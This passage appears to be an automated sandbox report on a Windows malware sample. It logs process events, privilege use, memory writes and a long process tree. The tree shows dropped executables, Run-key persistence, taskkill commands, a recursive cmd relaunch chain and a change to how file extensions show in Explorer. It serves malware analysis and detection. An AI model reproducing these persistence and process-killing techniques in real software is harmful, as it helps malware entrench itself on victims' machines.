10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exetaskkill.exetaskkill.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe

pid	process
4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3972	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3972	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3972	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3972	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3236	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3236	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3236	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3236	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4152	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4152	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4152	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4152	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
748	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
748	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
748	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
748	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4676	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4676	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4676	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4676	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4256	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4256	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4256	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4256	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1100	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1100	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1100	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1100	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3796	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3796	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3796	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
3796	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
4364	taskkill.exe
4364	taskkill.exe
4152	taskkill.exe
4152	taskkill.exe
832	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
832	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
832	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
832	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1664	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1664	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1664	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
1664	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
336	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
336	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
336	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
336	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	4364	taskkill.exe
Token: SeDebugPrivilege	624	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.execmd.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.execmd.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.execmd.exe10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.execmd.exe

description	pid	process	target process
PID 4376 wrote to memory of 4680	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	xsMYUowA.exe
PID 4376 wrote to memory of 4680	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	xsMYUowA.exe
PID 4376 wrote to memory of 4680	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	xsMYUowA.exe
PID 4376 wrote to memory of 2648	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	EAwYIQgk.exe
PID 4376 wrote to memory of 2648	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	EAwYIQgk.exe
PID 4376 wrote to memory of 2648	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	EAwYIQgk.exe
PID 4376 wrote to memory of 336	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4376 wrote to memory of 336	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4376 wrote to memory of 336	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4376 wrote to memory of 4852	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4852	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4852	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 1672	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 1672	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 1672	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4276	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4276	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4276	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4376 wrote to memory of 4256	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4376 wrote to memory of 4256	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4376 wrote to memory of 4256	4376	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 336 wrote to memory of 4644	336	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 336 wrote to memory of 4644	336	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 336 wrote to memory of 4644	336	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 4644 wrote to memory of 3656	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4644 wrote to memory of 3656	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4644 wrote to memory of 3656	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 3656 wrote to memory of 2532	3656	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 3656 wrote to memory of 2532	3656	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 3656 wrote to memory of 2532	3656	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 4644 wrote to memory of 2148	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 2148	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 2148	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4664	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4664	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4664	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4648	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4648	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 4648	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 4644 wrote to memory of 1192	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4644 wrote to memory of 1192	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4644 wrote to memory of 1192	4644	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 2240	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 2240	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 2240	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 4964	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 4964	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 4964	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 2224	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 2224	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 2224	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 3952	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 3952	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 3952	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	reg.exe
PID 2532 wrote to memory of 1312	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 1312	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2532 wrote to memory of 1312	2532	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 2240 wrote to memory of 4172	2240	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 2240 wrote to memory of 4172	2240	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 2240 wrote to memory of 4172	2240	cmd.exe	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
PID 4172 wrote to memory of 3528	4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4172 wrote to memory of 3528	4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 4172 wrote to memory of 3528	4172	10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe	cmd.exe
PID 1312 wrote to memory of 5000	1312	cmd.exe	cscript.exe

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
"C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4376

C:\Users\Admin\umcwocEU\xsMYUowA.exe
"C:\Users\Admin\umcwocEU\xsMYUowA.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4680

C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM EAwYIQgk.exe
3⤵
- Kills process with taskkill
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\ProgramData\saEgQgMs\EAwYIQgk.exe
"C:\ProgramData\saEgQgMs\EAwYIQgk.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2648

C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM xsMYUowA.exe
3⤵
- Kills process with taskkill
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
2⤵
- Suspicious use of WriteProcessMemory
PID:336

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
4⤵
- Suspicious use of WriteProcessMemory
PID:3656

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
6⤵
- Suspicious use of WriteProcessMemory
PID:2240

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
8⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:3972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
10⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
11⤵
- Suspicious behavior: EnumeratesProcesses
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
12⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
13⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
14⤵
PID:2148

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
15⤵
- Suspicious behavior: EnumeratesProcesses
PID:748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
16⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
17⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
18⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
19⤵
- Suspicious behavior: EnumeratesProcesses
PID:4256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
20⤵
PID:376

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
21⤵
- Suspicious behavior: EnumeratesProcesses
PID:1100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
22⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
24⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
25⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:832

C:\Users\Admin\umcwocEU\xsMYUowA.exe
"C:\Users\Admin\umcwocEU\xsMYUowA.exe"
26⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4260

C:\Windows\SysWOW64\taskkill.exe
taskkill /FI "USERNAME eq Admin" /F /IM EAwYIQgk.exe
27⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
26⤵
PID:1880

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
27⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
28⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
29⤵
- Suspicious behavior: EnumeratesProcesses
PID:336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
30⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
31⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
32⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
33⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
34⤵
PID:3732

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
35⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
36⤵
PID:2172

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
37⤵
- Modifies visibility of file extensions in Explorer
PID:4916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
38⤵
PID:4192

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
